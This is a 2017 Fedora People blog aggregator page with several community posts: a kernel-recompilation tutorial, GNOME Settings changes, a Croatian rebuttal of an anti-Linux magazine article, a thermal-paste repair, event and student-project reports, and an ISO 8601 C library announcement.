Fedora People

Discrepancy Report #107743

Posted by Caolán McNamara on October 23, 2017 08:21 PM
Short (1996) little article about a bug in the shuttle starboard manipulator arm display position.

Spoiler: <quote>A half-dozen pages of forms detail [the error] ... the most remarkable thing about the error and its paper trail. “There is no starboard manipulator arm”</quote>

What I have found interesting in Fedora during the week 42 of 2017

Posted by Fedora Community Blog on October 23, 2017 06:29 PM

After a week I would like to share some activities in Fedora happened since my last post:

Fedora 27 Server Beta is No-Go

On Thursday, 2017-Oct-19, we had a second round of the Go/No-Go meeting for the delayed F27 Beta release of the Server (modular) edition.  Result of the meeting is No-Go due to missing Release Candidate compose. We are going to run third round of the Go/No-Go meeting on Thursday, 2017-Oct-26 at 17:00 UTC together with the Go/No-Go meeting for F27 Final release.

Fedora 27 Final Freeze

Since Tuesday, October 17th we are in a Freeze period for F27 Final. It means the F27 Final release is pretty close and we are going to run Go/No-Go meeting on this Thursday, October 26th as well as F27 Final Readiness meeting.

Rawhide renamed to Bikeshed for the Modular Server

This is not a news from the last week, however I have realized not many people know about this.  At the beginning of October has been “rawhide” renamed to “bikeshed” for the Fedora Modular server. So, nowadays you can find the latest modular builds on Koji under the latest-Fedora-Modular-Bikeshed directory.

New election app

Thanks to Ryan Lerch, Justin Flory and Pingou we now have installed a new version of the Voting Application in the staging environment. Hopefully the new version will be available for the upcoming elections once F27 is made GA.

And of course, the list above is not exhaustive and there is much more going on in Fedora community. The list above just summarizing some tasks which has drawn my attention.

The post What I have found interesting in Fedora during the week 42 of 2017 appeared first on Fedora Community Blog.

How to recompile Fedora kernel with the custom patch

Posted by Jaroslav Škarvada on October 23, 2017 06:15 PM

I has been asked how to recompile Fedora kernel with the custom patch, so here is the tutorial:

At first install the needed packages:


# dnf install fedpkg dnf-plugins-core

Install build requirements for the kernel package:


# dnf builddep kernel

Clone the kernel dist-git module for the desired Fedora version, i.e. if you want to recompile the kernel for the Fedora 26, add the '-b f26' or respective version (--anonymous is used for the anonymous checkout, i.e. read only checkout):


$ fedpkg co --anonymous -b f26 kernel

Change the working directory to the cloned dist-git module:


$ cd kernel

Copy the desired patch (e.g. my.patch) to the working directory:


$ cp DIR/my.patch .

Make sure your my.patch has been generated by the 'git format-patch' if not, you need to manually add the header containing lines From:, Subject:, so proceed the following step just only if such header is not presented in your patch (of course edit the strings as needed):


$ echo "From: Joe Hacker <joe.hacker@hacker.org>" > header
$ echo "Subject: My patch" >> header
$ echo >> header
$ cat header my.patch > patch
$ mv patch my.patch

Edit the kernel.spec, locate the string '# END OF PATCH DEFINITIONS', and add the following string just before it:


Patch9999: my.patch

where make sure that the number 9999 is not used by any previous Patch keyword. If it's already used, keep increasing the number until you will find the highest unused number and use it with your patch. Save the spec file.

Recompile the kernel:


$ fedpkg local

Install/re-install the newly builds kernel RPMs from the ARCH directory, i.e. if you compiled the kernel for the x86_64, the ARCH directory is x86_64.

Reverted patch

In case you have upstream kernel patch you need to revert (let's say upstream.patch, do the previous steps up-to the installation of the my.patch, then unpack the kernel sources:


$ fedpkg prep

Make the reverted patch of the upstream.patch (replace the DIR in commands below by directory where you store your patches):


$ pushd kernel-*/linux-*
$ git commit -am Flush
$ cp DIR/upstream.patch .
$ patch -p1 -R < upstream.patch
$ git commit -am "Upstream reverted patch"
$ git format-patch --stdout HEAD~1 > DIR/upstream-reverted.patch
$ popd

Then install the upstream-reverted.patch instead of the my.patch and proceed with the compilation as described above.

Updated Settings Application in Fedora 27 Workstation

Posted by Fedora Magazine on October 23, 2017 08:00 AM

Fedora 27 Workstation is slated for release later in the year, and it ships with version 3.26 of GNOME. One of the awesome changes from upstream GNOME that is shipping in Fedora 27 is the re-designed Settings application. The new Settings has moved from a grid layout to a side panel, and several of the pages — like the display configuration — are also redesigned.

Side panel navigation

Previously, the Settings application provided navigation between the pages of settings using a grid of icons. In Fedora 27, navigation between the pages is done via a new side panel. This is similar to the layout of the GNOME Tweak Tool, and allows you to quickly and easily switch between pages of settings. Moving away from a gird layout, the settings application window is now resizeable and does not feel as cramped as in previous releases.

 Display Configuration

The display configuration page is completely revamped in Fedora 27 / GNOME 3.26. It now provides all the settings for configuring multiple monitors on a single page. The previous incarnation of this page required the user to drill down to change settings, and this revised layout makes it much quicker and easier to configure multiple monitors.

Network settings

The networks settings page is reworked in Fedora 27. The WiFi settings have their own page, and the network settings page is simpler and easier.

Taking a test drive

Fedora 27 includes the refreshed Settings Application (scheduled for release later in 2017). If you want to try out the new settings application, download a beta release of Fedora 27. Alternatively, if you can upgrade your current system to the Fedora 27 Beta.

Zaboravite na PCChipovo mišljenje o Linuxu

Posted by Vedran Miletić on October 22, 2017 07:17 PM

Naslovna slika: Annie Spratt | Unsplash (fotografija)

Moja je generacija klinaca u Hrvatskoj zainteresiranih za računalnu tehnologiju kasnih 90-ih i ranih 00-ih odrastala uz informatičke časopise kao što su VIDI, Bug, PCChip i (danas nepostojeći) Hacker. Kako su računalni zasloni tada bili izrazito loši, tekst i slike su puno bolje izgledali prikazani na papiru pa su časopisi bili prikladan medij za prenošenje informacija. U doba prije široke dostupnosti širokopojasnog interneta (ADSL je u Hrvatskoj postao dostupan u većim gradovima tek tijekom 2003. i 2004. godine), preuzimanje softvera i multimedijskih sadržaja s interneta bilo je izrazito sporo i pripadni CD-i koju su dolazili uz časopise bili su odličan način za doći do istih.

Naravno, svi su časopisi bili prisutni i na internetu i ondje također objavljivali vijesti. Vremenom, porastom brzine interneta, popularnosti blogova, foruma i društvenih mreža, popularnost i fizičkih i digitalnih časopisa je opala, a pitate li klince danas, vjerojatno će vam reći da preferiraju video sadržaj pred tekstualnim.

Bio sam nemalo iznenađen PCChipovim ovotjednim člankom 5 fundamentalnih razlika između Windowsa 10 i Linuxa u kojem je izvjesni B.P. usporedio ta dva operacijska sustava u terminima otvorenosti i zatvorenosti, privatnosti, sigurnosti, ažuriranja i podrške za starije i/ili slabije mašine.

Uzimajući u obzir ciljanu publiku, radi se o solidno napisanom i nepristranom članku koji nakon argumentacije po svakoj od točaka čitatelju ostavlja na izbor koji će operacijski sustav koristiti:

No, na kraju dana vi odlučujete – Windowsi ili Linux?

Vrijedi naglasiti da je većina ovdje navedenih časopisa vrlo rijetko pisala o Linuxu i softveru otvorenog koda, fokusirajući se umjesto toga na Windowse i pripadni ekosustav softvera. To je jedan od razloga zašto sam ih osobno prestao kupovati: nakon Mozillinih inicijalnih uspjeha, postao sam uvjeren da na isti način možemo razviti i paket uredskih alata i operacijski sustav. Kako sam htio biti dio te priče, ovi časopisi bi me držali fokusiranog na teme iz Windowsa i pripadnog ekosustava softvera koje me nisu zanimale.

Još sam se više iznenadio po izlasku drugog nedavnog članka na temu Linuxa pod naslovom Zaboravite na Linux. Ovo su razlozi zbog kojih biste trebali ostati na Windowsima iz pera… ovaj, tipkovnice izvjesnog I.H. Taj je članak izrazito traljavo napisan i često težak za čitati, ali ovdje se nećemo baviti narativnom i pravopisnom sposobnošću autora, već isključivo kvalitetom argumenata koje nudi. Analizirajmo redom tvrdnje koje iznosi u članku.

Velik broj korisnika i danas lomi koplja na relaciji Windows – Linux. Neki kažu kako je Linux ono što bi svi korisnici na globalnom nivou trebali koristiti i to iz više razloga: besplatan je, radi se o ”open source” operativnim sustavima koji je podoban za izmjene i dopune korisnika i navodno za Linux postoji manje virusa i ostalih štetnih programa nego što je to slučaj kod Windowsa.

Ovo je točno.

No je li to zaista tako i jesu li pobornici Linuxa u pravu kada sve ovo navode kao glavne razloge zbog kojih je, da tako kažemo- Linux platforma bolja i više ”user friendly” od Windowsa?

Linux je više “user friendly”, samo je vrlo izbirljiv po pitanju toga koga smatra svojim prijateljima. 😉

Windows još od davnih dana slovi kao operativni sustav koji je osmišljen od jedne od ”onih tvrtki”, odnosno od tvrtki kojima je cilj proširiti se na što veći broj osobnih računala i bez da pritom vode stvarnu brigu o potrebama korisnika.

Jest, ali isto je i Red Hat Enterprise Linux i SUSE Linux Enterprise, Joyentov SmartOS, a zašto ne i Android.

Za razliku od Windowsa, Linux čim je ugledao svjetlo dana nekako je dočekao kao ”svjetlo na kraju tunela”, odnosno kao platforma koja će korisnicima biti adekvatna zamjena. S obzirom da je puno godina prošlo otkako je Linux prvi puta ugledao svjetlo dana i s obzirom da smo od tada do današnjih dana imali prilike usporediti nekoliko Linux-a i Windowsa, konačan odgovor ne ide baš na korist Linux-u.

Zbog čega je ipak Windows operativni sustav koji je isplativiji za korištenje (pogotovo na dugoročnom planu) i što je to gdje se Linux jednostavno ne može nositi s Windowsima – pročitajte u nastavku.

Ovdje nema argumenata.

Što je ono što vi kao korisnik želite od operativnog sustava koji koristite, bez obzira o kojem operativnom sustavu se radilo? Odgovor je vjerojatno da je operativni sustav kompatibilan i da za taj operativni sustav postoji adekvatan broj programa i aplikacija koje su kompatibilne s tim operativnim sustavom.

Ovo je točno.

Da, istina je da postoji određen broj programa koji su jednako kompatibilni i dostupni za Linux kao i za Windows (recimo 7-Zip i Irfan View), no činjenica jest da za Windows postoji cijelo mnoštvo programa i aplikacija koje na različite načine služe korisnicima za bolje upoznavanje računalom, računalnim sustavom, dok to kod Linuxa jednostavno nije slučaj.

Aktualna verzija Fedore, verzija 26, imala je na dan izlaska 53912 paketa softvera u svojem službenom repozitoriju (možete vjerovati na riječ ili ih prebrojati na nekom od brojnih mirrora), a za dodatne softvere postoje repozitoriji RPM Fusion, Copr i drugi. Vjerujem da bi i druge popularne distribucije imale slične statistike. Štogod “upoznavanje računalom” značilo (računam da autor ne misli na aplikacije za upoznavanje ljudi putem interneta za druženje i veze) tvrditi da na Linuxu “ne postoji čistavo mnoštvo aplikacija koje na različite načine služe korisnicima za bolje upoznavanje računalom” je naprosto pogrešno.

Što je s videoigrama? Opet, istina, postoji određen broj videoigara koje su dostupne za Linux (nešto više o njima možete pročitati u jednom od naših proteklih članaka, odnosno ovdje), no ako ćemo iskreno, to je kap u moru u usporedbi sa brojem i kvalitetom igara koje su dostupne za Windows (još pogotovo ako uzmemo u obzir da je velik broj starijih igara potpuno kompatibilan i sa Windowsima 10 zahvaljujući modu kompatibilnosti).

U Steamovoj biblioteci autora ovog teksta približno 50% igara radi na Linuxu, a slično je i kod drugih korisnika Linuxa s kojima ima kontakt i koje zanima gaming. Zatim, Steam za Windowse i neke igre u njemu, kao i velik broj igara van Steama je moguće pokrenuti preko Winea. To, dakako, ne pokriva sve igre koje postoje na Windowsima, ali reći da je broj igara koje se mogu igrati na Linuxu “kap u moru u usporedbi sa brojem i kvalitetom igara koje su dostupne za Windows” ne stoji, osim ako je kap veličine više od pola mora.

Koliko je mod kompatibilnosti koji postoji u Windowsima 10 uspješno izveden ne mogu reći, međutim, autor ovdje ne navodi jedan veliki problem izravno vezan uz kompatibilnost, a to je Microsoftov vendor lock-in inherentan u DirectX-u 12 i Windows Storeu. Naime, sve novije igre koje koriste DirectX 12 mogu se distribuirati samo kao UWP aplikacije putem Windows Storea, što ograničava njihovu prenosivost na Android, Linux i macOS. DirectX 12 nije podržan niti na jednom operacijskim sustavu osim Windowsa 10. Windows Store ne postoji niti na jednom operacijskim sustavu osim Windowsa i gotovo sigurno neće ni postojati. Nerealno je očekivati da će se taj problem u budućnosti riješiti, tako da možemo tvrditi da su igre koje koriste DirectX 12 zaključane i na Windows 10 i na distribuciju putem Windows Storea (ne možete ih, recimo, prodavati putem Steama ili Uplaya).

Otvoreni standard koji je alternativa DirectX-u 12, Vulkan, nema te probleme: uz Android i Linux, podržava Windowse od XP-a nadalje (što uključuje i 7, 8, 8.1 i 10). Upravo je podrška za Windows 7 vrlo značajan faktor obzirom da, dvije godine nakon izlaska verzije 10, podjednak broj gamera na Steamu koristi 7 i 10. Veliku podršku Vulkanu pred DirectX-om 12 daju legendarni studio za razvoj igara id Software, koji kaže da im odgovara upravo ta podrška za više platformi i starije verzije Windowsa, i hrvatski studio za razvoj igara Croteam, koji je, uzgred budi rečeno, prvi studio u svijetu koji je na tržište izbacio AAA igru s podrškom za Vulkan, The Talos Principle.

Istina je da i na Steamu postoji određen broj Linux igara koje su čak i besplatne, no to je još uvijek daleko od platformske podrške koju uživaju svi drugi operativni sustavi, ne samo Windows. Sve u svemu- softversko područje je za Windows platformu odlično pokriveno, dok za Linux, bez obzira na toliki broj godina koliko je Linux dostupan na tržištu, to isto ne može reći.

Pogledamo li podatke o broju igara, pritom ne razlikujući AAA i indie igre i brojeći svaku igru kao jednu igru, nalazimo 8547 igara za Linux i 13421 igara za macOS; macOS ih ima 50% više, ali radi se o istom redu velične. Naravno, 36169 igara za Windows je sasvim druga priča, ali treba uzeti u obzir da se mnoge indie igre rade prvo za Windowse, a zatim nikad za ostale operacijske sustave.

Obzirom da je Valve tek 2010. godine na Linux prebacio prvu igru (Team Fortress 2) i klijent za Steam, o gamingu na Linuxu nema smisla pričati o van tog sedmogodišnjeg razdoblja (uz časnu iznimku nekoliko ranijih naslova već spomenutog id Softwarea koji su prebačeni na Linux isključivo zahvaljujući entuzijazmu Johna Carmacka). U tih 7 godina, Steam je došao od jednog naslova do 8547, podršku za Linux je dodao i GOG.com, AMD je uspostavio sustav koji je donio visokokvalitne upravljačke programe otvorenog koda za grafičke procesore (NVIDIA i Intel su nastavili biti standardno kvalitetni kako su bili i ranije), pokrenut je GamingOnLinux koji mjesečno ima preko pola milijuna pogleda (u pojedinim mjesecima i bliže milijun), a dva subreddita na temu gaminga na Linuxu imaju desetke tisuća pretplatnika.

Je li ovo usporedivo s gaming scenom na Windowsima? Ni blizu. Je li vrijedno spomena? Smatram da svakako jest. Pokazuje li trend rasta? Bez daljnjega.

Još jedna vrlo važna stvar na koju korisnici vrlo često obraćaju pozornost jest dostupnost nadogradnji baze podataka operativnog sustava, odnosno dostupnost istih.

Znači, prosječan korisnik jako brine o nadogradnji MySQL-a/MariaDB-a i PostgreSQL-a? /s

Koliko često je neka nadogradnja baze podataka dostupna za Linux? Čak i kada jest dostupna, često se zna dogoditi da ta nadogradnja ”debelo” kasni za nadogradnjom koja je dostupna za Windows. Što je razlog tomu što nadogradnje za Linux kasne? Razlog, odnosno uzrok toga je logičan.

Pogledajmo. Fedorine nadogradnje PostgreSQL-a i MariaDB-a. Meni se, nakon brzinskog pregleda, čini da nadogradnje ne kasne za nadogradnjama koje su dostupne na stranicama proizvođača tih softvera, ali mi je vrlo jasno da autora zapravo ne zanimaju samo baze podataka i da vjerojatno ne zna o čemu priča.

Korisnici Windows operativnih sustava- i to samo ovih novijih Windowsa 7, 8, 8.1 i Windowsa 10 čine više od osamdeset posto sveukupnih korisnika računala na svijetu tako da je logično da će nadogradnje za te operativne sustave biti češće dostupne nego nadogradnje za Linux, čijih korisnika ima oko dva posto. Veća potražnja – veća dostupnost – što zajedno čini da neki operativni sustav bude ”iznad” nekog drugog.

Fedora 26 je imala 6389 nadogradnji u malo više od 3 mjeseca od izlaska. Kada bi Windowsi imali sličan broj nadogradnji, to bi značilo da Windows 10 od datuma izlaska (pred više od dvije godine) do današnjeg dana ima najmanje 50000 nadogradnji. Nažalost, podatke o broju nadogradnji za Windows 10 ne pronalazim, ali kada se priča o 20000+ nadogradnji za Windows 7, radi se o toliko operacija koje nadogradnje izvode, pri čemu svaka nadogradnja izvodi desetke, stotine ili tisuće operacija. Tako da je teško povjerovati da je Microsoft dosad izbacio najmanje 50000 nadogradnji za Windows 10, unatoč “većoj potražnji” posljedica koje je nekakva apstraktna “veća dostupnost”.

Kao što sam rekao, Windows operativni sustavi koji se danas najčešće koriste kod velikog broja korisnika su Windows 10, 7 i 8, s time da se Windows 8 slabije koristi od navedena tri. To je u svakom slučaju manje ako usporedimo ovaj broj sa brojem Linuxa koji se koriste.

Naime, prema nekim mjerenjima, postoji više od 100 ”podvrsta” ili verzija Linux operativnih sustava od kojih korisnik može odabrati onaj koji njemu najviše odgovara, ovisno o njegovim potrebama.

Kako je Linux softver otvorenog koda, realno je za očekivati da će svatko tko ima znanja i interesa napraviti distribuciju savršeno prilagođenu vlastitim potrebama. No, većina korisnika i dalje koristi neku od desetak (usudio bih se reći i manje) glavnih distribucija ili neku od njihovih derivata.

Kako odabrati Linux koji ”meni najviše odgovara?”

Vrlo jednostavno: iskoristite Distrochooser ili neki sličan alat, pročitajte neki od brojnih članaka na temu pa odlučite, a možete i pitati članove lokalne grupe korisnika Linuxa koje distribucije koriste i preporučaju.

Nemojte misliti da je odabir Linux operativnog sustava jednostavan. Za razliku od Windowsa čija se srž niti kroz posljednjih deset godina nije osjetnije promijenila, kod Linuxa to nije tako. Prije nego što korisnik odluči koji će Linux OS koristiti potrebno je dobrano proučiti koji bi bio najprikladniji za ono što korisniku treba. Naravno da će pobornici Linuxa reći da je bez obzira na sve Linux ”bolji”, ali treba biti realan.

Ako je problem u tome da treba dati zadani izbor za prosječnog desktop korisnika zainteresiranog za gaming, autor ovog teksta bezrezervno preporučuje Fedoru. Fedora se nije osjetnije promijenila od 2003. godine, osim što su temeljne vrijednosti u nekom trenutku formalno napisane i što je zajednica korisnika i doprinositelja projektu prilično narasla.

To je sve?

Ono što je uobičajeno jest da Windowsi budu ti koji će prvi dobiti najnovije drivere, nakon čega drivere dobivaju Mac OS. Linux-bazirani operativni sustavi su vrlo često ”sretni” ako uopće dobiju drivere kao takve. Jedino što Linux koliko-toliko tu drži uz bok s Windowsima i Mac OS-om je zajednica koja podržava Linux i čiji se članovi često sami potrude napraviti drivere za neke verzije Linuxa, što je i za svaku pohvalu.

Ovo je u prosjeku možda bilo točno 2002. godine, ali danas svakako nije. Nažalost, još uvijek postoji manji broj proizvođača hardvera koji ne daje upravljačke programe za Linux za svoj hardver, ali čak i tada zajednica problem često riješi sama. Što se tiče hipoteze da Linux dobiva drivere nakon Windowsa i macOS-a, bilo bi dobro da autor navede primjer za to što tvrdi. Naime, već navedeni NVIDIA i Intel dokazuju da više od desetljeća to nije slučaj u domeni grafičkih procesora, a AMD pokazuje da i druge kompanije razumiju važnost izrade kvalitetnih upravljačkih programa za Linux istovremeno kad i za Windows.

Ipak, koji se problem može javiti ako neki programer sam želi napraviti neki driver? Najčešći problem jest taj da driveri koje on osmisli i kreira budu bugoviti. Naravno da i Windows platforma, bez obzira na svu podršku ima problema s bugovima, o tome nema govora. No, Windows za razliku od Linuxa ima cijeli tim stručnjaka koji, odmah nakon što se neki bug pojavi, rade na rješavanju istoga, dok je kod različitih i mnogobrojnih verzija Linuxa to drugačije.

Točno je, recimo, da su 2007. upravljački programi za neke zvučne kartice bili bugoviti, ali ne i danas. Točno je, isto tako i primjera radi, da Qualcomm, jedan od proizvođača bežičnih mrežnih kartica, ima kod sebe zaposlene ljude koji na redovnoj bazi i to izravno u jezgru Linuxa dodaju poboljšanja upravljačkih programa za hardver koji proizvode i prodaju. Opet, ako autor ne priča napamet, bilo bi dobro da navede primjer za to što tvrdi.

Mislite li da je Linux jednostavan ili jednostavniji nego što je bio prije deset godina ili mislite da je jednostavniji za korištenje od Windowsa? Što god od ove tri mogućnosti da mislite, opet naravno mišljenja se razlikuju od korisnika do korisnika (naravno da će korisnici koji su naviknuli na Linux reći kako je on jednostavniji od Windowsa), no treba opet nekako pokušati biti realan i reći kako stvari stoje.

Da ste korisnik-laik, znači da nemate nikakvog posebnog iskustva u korištenju niti jednog operativnog sustava i da imate priliku koristiti Linux i Windows, koji bi vam bio jednostavniji? Odgovor je- Windows.

Windows je jednostavno puno više ”user-friendly”, pogotovo za korisnike-početnike nego što je Linux i to je jednostavno tako.

Ovdje nažalost nema argumenata.

Ako se niste dosad sreli s desktopima na Linuxu, pogledajte GNOME 3 i KDE Plasma i procijenite sami koliko je to više ili manje “user friendly” od neke verzije Windowsa.

Posljednje i najvažnije pitanje za kraj – Linux ili Windows? Koji je bolji? Ovisi. Ovisi jeste li korisnik kojemu je glavni cilj programiranje i rad sa ”open source” programima (kakav je Linux) ili ste korisnik koji želi da njegov operativni sustav ima kompatibilnost, jednostavnost sučelja i korištenja, široku dostupnost u pogledu programa i igara i operativni sustav na kojem ćete, recimo moći kliknuti na BS Player i bez problema pokrenuti neki film.

Na Fedori nećete imati BS Player, ali ćete  korištenjem aplikacije Softver lako naći neku od aplikacija koja izvodi video sadržaj. Aplikacija Softver je svojevrsni ekvivalent Google Playa i App Storea; kad imate trgovinu slobodnog softvera otvorenog koda nadohvat ruke, ne morate tražiti po internetu i instalirati softver sa slučajno nađenih web stranica te preuzimati sve rizike koji pritom postoje.

Sve ovisi o ukusima, o kojima se ne raspravlja. No ako spaate pod većinu običnih ili ”casual” korisnika – odaberite Windows.

Naravno da svatko od vas treba birati za sebe. No, ako spadate pod korisnike kojima je dosta već spomenutog Microsoftovog vendor lock-ina na Windows 10, DirectX 12 i Windows Store kojim bi oni sebi zauvijek osigurali tržište u doba kad više nisu konkuretni, Microsoftovog narušavanja vaše privatnosti kroz takozvanu “telemetriju” i toga da Microsoft odlučuje umjesto vas što će biti instalirano na vašem računalu, odaberite Fedoru.

tl;dr radi se izrazito lošem članku obzirom da većina stvari koje autor tvrdi su možda i bile točne 2002. godine, ali već 2007. godine su dobrim dijelom bile netočne i zasigurno su netočne danas.

Changement de pâte thermique sur mon ordinateur portable

Posted by Charles-Antoine Couret on October 22, 2017 04:58 PM

Il y a parfois des tâches d'entretien d'un ordinateur qu'on oublie de faire et qui pourtant sont essentielles.

Le changement de pâte thermique en fait parti. La pâte thermique est ce qui permet d'améliorer la conductivité thermique entre le processeur (ou le GPU) et le radiateur dédié à évacuer cette chaleur. Il permet de gommer les aspérités des deux surfaces pour augmenter la surface de contact et éviter la présence d'air qui est un bon isolant.

Mais la pâte thermique n'est efficace que quelques années, ensuite il commence à se fissurer, à se décoller et donc à ne plus remplir correctement sa fonction. Il est nécessaire de le remplacer.

Mon ordinateur est un HP Elitebook 8560w qui vient de fêter ses 6 ans d'utilisation. Depuis quelques semaines / mois, la température était constamment entre 80 et 100°C, même si je ne faisais rien de particulier. C'est bien trop chaud. Du coup le processeur se mettait en économie d'énergie pour éviter la surchauffe ce qui dégradait les performances.

Je me suis décidé à régler le problème, ne prévoyant pas de changer de machine avant quelques mois.

Matériel

Coût total, moins de 30€.

En effet, ma machine possède beaucoup de vis Torx, puis pour éviter d'abimer la machine j'ai préféré avoir un outil très fin pour séparer les éléments et avoir de quoi gratter la pâte thermique. D'où l'achat des deux sets qui permettent globalement de démonter pas mal de machines en théorie.

Une petite pince est assez appréciable pour manipuler les petits connecteurs.

Opérations

Avant de commencer, pour éviter de faire des erreurs, j'ai préféré consulter une vidéo du démontage avant.

Comme beaucoup d'ordinateurs portables, accéder à la carte graphique et au processeur n'est pas évident. Il faut pratiquement tout retirer de la partie basse de la machine : clavier, touchpad, disque dur, lecteur CD... En fait il ne reste qu'une partie du châssis et la carte mère.

On retire donc l'ensemble du module de refroidissement qui est commun pour le processeur et la carte graphique. En effet, chacun a son radiateur qui communique la chaleur à un ventilateur et à un radiateur externe commun. Cela rend l'opération un peu plus pénible.

Vous pouvez voir le module démonté :

IMG-20171020-WA0001.jpg

Et la carte mère, avec le CPU sur la gauche, la carte graphique sur la droite :

IMG-20171020-WA0000.jpg

Bien entendu il faut ensuite tout remonter, sans se planter sur les vis. Essayer de bien réintégrer les éléments (ce dont j'ai échoué la première fois, notamment le connecteur pour les touches de la souris qui n'a pas été bien enfiché). Allumer la bête et tester que tout va bien. Et ouf tout fonctionne.

Résultats

Maintenant mon ordinateur au repos fonctionne entre 60 et 80°C. Les 100°C ne sont atteints que lors d'une activité intensive. C'est quand même bien plus sympa, à l'usage j'ai moins de ralentissements, l'utiliser sur les genoux est possible sans se brûler.

Pour un peu moins de 30€ et près de 3h à s'en occuper le résultat est très appréciable. N'hésitez pas à le faire si votre machine chauffe trop (et si bricoller un peu ne vous fait pas peur). ;-)

Friday, 20 oct, was final day of LatinoWare and temperature stabled to 28ºC with some clouds. Participants...

Posted by Wolnei Tomazelli Junior on October 21, 2017 09:17 PM
Friday, 20 oct, was final day of LatinoWare and temperature stabled to 28ºC with some clouds. Participants started arriving at the event again around 10:20 am.
10 am until 11 am, in room Venezuela was my talk about Fedora QA to 15 persons and to my surprise inspired Dennis Gilmore to start run Kernel Tests in his ARM board.
Once again on the last day of any event in Brazil, is the free distribution of adhesives, limited to one per person each type as we had stock. At end Fedora Project distributed 700 adhesives, 25 badge cords to old or new contributors, installed 2 notebooks and gain three new people to review packaging, translation and websites.
The main activity occurred at 14h with the official photo capture the event with all participants and 6pm was event final goodbye ceremony. #fedora #latinoware #linux #FozIguacu

21/10/2017


Exploring Google Code-In, ListenBrainz easyfix bugs, D3.js

Posted by Justin W. Flory on October 21, 2017 09:01 AM
On the data refrain: Contributing to ListenBrainz

This post is part of a series of posts where I contribute to the ListenBrainz project for my independent study at the Rochester Institute of Technology in the fall 2017 semester. For more posts, find them in this tag.


Last week moved quickly for me in ListenBrainz. I submitted multiple pull requests and participated in the weekly developer’s meeting on Monday. I was also invited to take part as a mentor for ListenBrainz for the upcoming round of Google Code-In! In addition to my changes and new role as a mentor, I’m researching libraries like D3.js to help build visualizations for music data.  Suddenly, everything started moving fast!

Last week: Recap

The ListenBrainz team accepted my development environment improvements and documentation. This gave me an opportunity to better explore project documentation tools. I experimented with Sphinx and Read the Docs. Sphinx introduced me to reStructuredText for documentation formats. I’ve avoided it in favor of Markdown for a long time, but I see where reStructuredText is stronger for advanced documentation.

Since ListenBrainz is a new project, I plan to contribute documentation for any of my work and improve documentation for pre-existing work. One of the goals for this independent study is to make ListenBrainz a viable candidate for a future data analysis course. To make it easy to use and understand, ListenBrainz needs excellent documentation. Since one of my strengths is technical writing, I plan to contribute more documentation this semester.

You can see some of the new documentation already!

Google Code-In mentor

The MetaBrainz community manager, Freso Olesen, approached me to mentor for Google Code-In. Google Code-In is an opportunity for teenagers to meaningfully contribute to open source projects. Google describes Google Code-In as…

Pre-university students ages 13 to 17 are invited to take part in Google Code-in: Our global, online contest introducing teenagers to the world of open source development. With a wide variety of bite-sized tasks, it’s easy for beginners to jump in and get started no matter what skills they have.

Mentors from our participating organizations lend a helping hand as participants learn what it’s like to work on an open source project. Participants get to work on real software and win prizes from t-shirts to a trip to Google HQ!

MetaBrainz is a participating organization of Google Code-In this cycle. Because of my work with ListenBrainz, I will contribute a few hours a week to help mentor participating students with ListenBrainz. Beginner problems should be easy to help with since I’m still beginning too, and as I spend more time with ListenBrainz, I can help with harder problems.

I’m excited to give back to one of my favorite open source projects in this way! I’m grateful to have this chance to help out during Google Code-In.

Choosing easyfix bugs

After I figured out the development environment issues, I went through open tickets filed against ListenBrainz to find some to work on. I made a preliminary pass through all open tickets and left some comments for more information, when needed. The tickets I highlighted to look into next were

  • LB-85: Username in the profile URL should be case insensitive
  • LB-124: Install messybrainz as a a python library from requirements
  • LB-176: Add stats module and begin calculating some user stats from BigQuery
  • LB-206: “playing_now” submissions not showing on profile
  • LB-212: Show the MetaBrainz logo on the listenbrainz footer.

Of these five, LB-124 and LB-212 are already closed. While drafting this article, I completed LB-124 in PR #266. This was part of a test to get the documentation building again because of odd import errors. Later, a new student also learning the project for the first time asked to work on LB-212. Since it was a good first task to explore the project code, I passed the ticket to him.

I want to do one more “easyfix” bug before going into the main part of my independent study timeline. I don’t yet feel comfortable with the code and one more bug solved will help. After this, I plan to pursue the heavier lifting of the independent study to explore data operations and queries to make.

Researching D3.js

Prof. Roberts introduced D3.js as a library to build interactive, dynamic charts and visual representations of data. I haven’t yet looked into much front-end work, but this was a cool project that I wanted to highlight in my weekly report. This feels like it could be a powerful match for ListenBrainz, especially since the data has high detail.

Upcoming activity

This next week, I won’t have as much time to contribute to ListenBrainz. On October 21, I’m traveling to Raleigh, NC for All Things Open. On October 24, I present my talk, “What open source and J.K. Rowling have in common“. Since I’ll be out of Rochester and missing other classwork, I expect less time on my ListenBrainz work.

This next week will be slower than the last two weeks. Hopefully I’ll learn something at the conference too to bring back for ListenBrainz.

Until then… keep the FOSS flag high.

The post Exploring Google Code-In, ListenBrainz easyfix bugs, D3.js appeared first on Justin W. Flory's Blog.

[Fedora 27] Client-Side-Decoration in Firefox 57 aktivieren

Posted by Fedora-Blog.de on October 21, 2017 07:30 AM

Kurz notiert:

Fedora 27 enthält Pakete für Firefox 57, welches Client-Side-Decoration (CSD) von GTK3 unterstützt.

Um die CSD zu aktivieren, muss lediglich in about:config der Wert widget.allow-client-side-decoration auf true geändert und anschließend Firefox neu gestartet werden.

Introducing libiso8601

Posted by Nathaniel McCallum on October 20, 2017 10:45 PM

Four years ago I needed a library for parsing ISO 8601 dates in C. After I wrote most of it, we ended up going in a different direction. This code has sat on my computer since then. But no more!

This week I polished it up and pushed it to GitHub. The library is fully tested (with >98% code coverage) and handles not only all the ISO 8601 standard formats but many common non-standard variations as well.

Here’s an example of how to use it:

#include <iso8601.h>
#include <assert.h>
#include <string.h>

int main() {
    iso8601_time time = {};
    char str[128] = {};

    iso8601_parse("2010-02-14T13:14:23.123456Z", &time);

    assert(time.year == 2010);
    assert(time.month == 2);
    assert(time.day == 14);
    assert(time.hour == 13);
    assert(time.minute == 14);
    assert(time.second == 23);
    assert(time.usecond == 123456);

    iso8601_unparse(&time, ISO8601_FLAG_NONE, 4, ISO8601_FORMAT_WEEKDATE,
                    ISO8601_TRUNCATE_DAY, sizeof(str), str);

    assert(strcmp(str, "2010-W06-7") == 0);
    return 0;
}

I’d love to get some review of the API before I release the first version. So if you’re into telling people how bad their code is, please wander this way!

Firefox 57 für Fedora 26 und 27

Posted by Fedora-Blog.de on October 20, 2017 08:00 PM

